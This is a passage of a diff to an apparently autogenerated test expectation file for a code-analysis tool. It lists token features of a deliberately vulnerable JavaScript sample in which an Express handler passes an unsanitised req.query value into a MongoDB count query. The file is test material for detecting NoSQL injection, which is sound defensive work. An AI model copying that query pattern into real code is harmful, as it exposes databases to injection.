(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:39 | require("./dbo.js") | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:39 | require("./dbo.js") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:39 | require("./dbo.js") | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:29:80:38 | "./dbo.js" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:29:80:38 | "./dbo.js" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:29:80:38 | "./dbo.js" | calleeImports | | @@ -1854,6 +9901,66 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:29:80:38 | "./dbo.js" | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:29:80:38 | "./dbo.js" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:29:80:38 | "./dbo.js" | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:81:13 | importedDbo | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:81:13 | importedDbo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:81:13 | importedDbo | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:81:13 | importedDbo | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:81:13 | importedDbo | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:7 | importedDbo\\n .db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:7 | importedDbo\\n .db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:7 | importedDbo\\n .db | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:7 | importedDbo\\n .db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:7 | importedDbo\\n .db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:9 | exceptional return of importe ... .db() | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:9 | exceptional return of importe ... .db() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:9 | exceptional return of importe ... .db() | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:9 | exceptional return of importe ... .db() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:9 | exceptional return of importe ... .db() | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:9 | importe ... .db() | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:9 | importe ... .db() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:9 | importe ... .db() | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:9 | importe ... .db() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:82:9 | importe ... .db() | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:15 | importe ... lection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:15 | importe ... lection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:15 | importe ... lection | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:15 | importe ... lection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:15 | importe ... lection | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:23 | exceptional return of importe ... "logs") | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:23 | exceptional return of importe ... "logs") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:23 | exceptional return of importe ... "logs") | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:23 | exceptional return of importe ... "logs") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:23 | exceptional return of importe ... "logs") | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:23 | importe ... "logs") | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:23 | importe ... "logs") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:23 | importe ... "logs") | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:23 | importe ... "logs") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:83:23 | importe ... "logs") | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:10 | importe ... .count | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:10 | importe ... .count | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:10 | importe ... .count | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:10 | importe ... .count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:10 | importe ... .count | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:25 | exceptional return of importe ... tag }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:25 | exceptional return of importe ... tag }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:25 | exceptional return of importe ... tag }) | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:25 | exceptional return of importe ... tag }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:25 | exceptional return of importe ... tag }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:25 | importe ... tag }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:25 | importe ... tag }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:25 | importe ... tag }) | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:25 | importe ... tag }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:81:3:85:25 | importe ... tag }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:82:6:82:7 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:82:6:82:7 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:82:6:82:7 | db | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:82:6:82:7 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:82:6:82:7 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:83:6:83:15 | collection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:83:6:83:15 | collection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:83:6:83:15 | collection | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:83:6:83:15 | collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:83:6:83:15 | collection | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:83:17:83:22 | "logs" | CalleeFlexibleAccessPath | importedDbo.db().collection | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:83:17:83:22 | "logs" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:83:17:83:22 | "logs" | calleeImports | ./dbo.js | @@ -1862,6 +9969,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:83:17:83:22 | "logs" | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:83:17:83:22 | "logs" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:83:17:83:22 | "logs" | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:6:85:10 | count | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:6:85:10 | count | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:6:85:10 | count | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:6:85:10 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:6:85:10 | count | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:12:85:24 | { tags: tag } | CalleeFlexibleAccessPath | importedDbo.db().collection().count | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:12:85:24 | { tags: tag } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:12:85:24 | { tags: tag } | calleeImports | ./dbo.js | @@ -1870,6 +9982,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:12:85:24 | { tags: tag } | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:12:85:24 | { tags: tag } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:12:85:24 | { tags: tag } | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:17 | tags | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:17 | tags | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:17 | tags | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:17 | tags | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:17 | tags | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:22 | tags: tag | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:22 | tags: tag | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:22 | tags: tag | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:22 | tags: tag | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:22 | tags: tag | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:22 | tags: tag | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:22 | tags: tag | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:22 | tags: tag | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:22 | tags: tag | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:14:85:22 | tags: tag | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:20:85:22 | tag | CalleeFlexibleAccessPath | importedDbo.db().collection().count | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:20:85:22 | tag | InputAccessPathFromCallee | 0.tags | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:20:85:22 | tag | InputArgumentIndex | 0 | @@ -1880,6 +10007,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:20:85:22 | tag | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:20:85:22 | tag | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:85:20:85:22 | tag | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:1:89:3 | app | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:1:89:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:1:89:3 | app | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:1:89:7 | app.get | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:1:89:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:1:89:7 | app.get | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:1:91:2 | app.get ... am);\\n}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:1:91:2 | app.get ... am);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:1:91:2 | app.get ... am);\\n}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:1:91:2 | exceptional return of app.get ... am);\\n}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:1:91:2 | exceptional return of app.get ... am);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:1:91:2 | exceptional return of app.get ... am);\\n}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:5:89:7 | get | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:5:89:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:5:89:7 | get | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:9:89:14 | '/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:9:89:14 | '/:id' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:9:89:14 | '/:id' | calleeImports | express | @@ -1887,6 +10029,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:9:89:14 | '/:id' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:9:89:14 | '/:id' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:9:89:14 | '/:id' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:89:16 | useParams | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:89:16 | useParams | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:89:16 | useParams | enclosingFunctionBody | req res useParams req param | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:89:16 | useParams | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:89:16 | useParams | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res useParams req param | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | 'arguments' object of anonymous function | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | (req, r ... ram);\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | (req, r ... ram);\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | (req, r ... ram);\\n} | calleeImports | express | @@ -1894,11 +10046,192 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | (req, r ... ram);\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | (req, r ... ram);\\n} | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | (req, r ... ram);\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | exceptional return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | exceptional return of anonymous function | enclosingFunctionBody | req res useParams req param | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | exceptional return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | return of anonymous function | enclosingFunctionBody | req res useParams req param | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:17:91:1 | return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:18:89:20 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:18:89:20 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:18:89:20 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:18:89:20 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:18:89:20 | req | enclosingFunctionBody | req res useParams req param | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:18:89:20 | req | enclosingFunctionBody | req res useParams req param | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:18:89:20 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:18:89:20 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:18:89:20 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:18:89:20 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:23:89:25 | res | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:23:89:25 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:23:89:25 | res | enclosingFunctionBody | req res useParams req param | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:23:89:25 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:89:23:89:25 | res | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:11 | useParams | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:11 | useParams | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:11 | useParams | enclosingFunctionBody | req res useParams req param | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:11 | useParams | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:11 | useParams | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:22 | exceptional return of useParams(req.param) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:22 | exceptional return of useParams(req.param) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:22 | exceptional return of useParams(req.param) | enclosingFunctionBody | req res useParams req param | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:22 | exceptional return of useParams(req.param) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:22 | exceptional return of useParams(req.param) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:22 | useParams(req.param) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:22 | useParams(req.param) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:22 | useParams(req.param) | enclosingFunctionBody | req res useParams req param | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:22 | useParams(req.param) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:3:90:22 | useParams(req.param) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:13:90:15 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:13:90:15 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:13:90:15 | req | enclosingFunctionBody | req res useParams req param | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:13:90:15 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:13:90:15 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:13:90:21 | req.param | CalleeFlexibleAccessPath | useParams | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:13:90:21 | req.param | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:13:90:21 | req.param | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:13:90:21 | req.param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:13:90:21 | req.param | enclosingFunctionBody | req res useParams req param | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:90:13:90:21 | req.param | 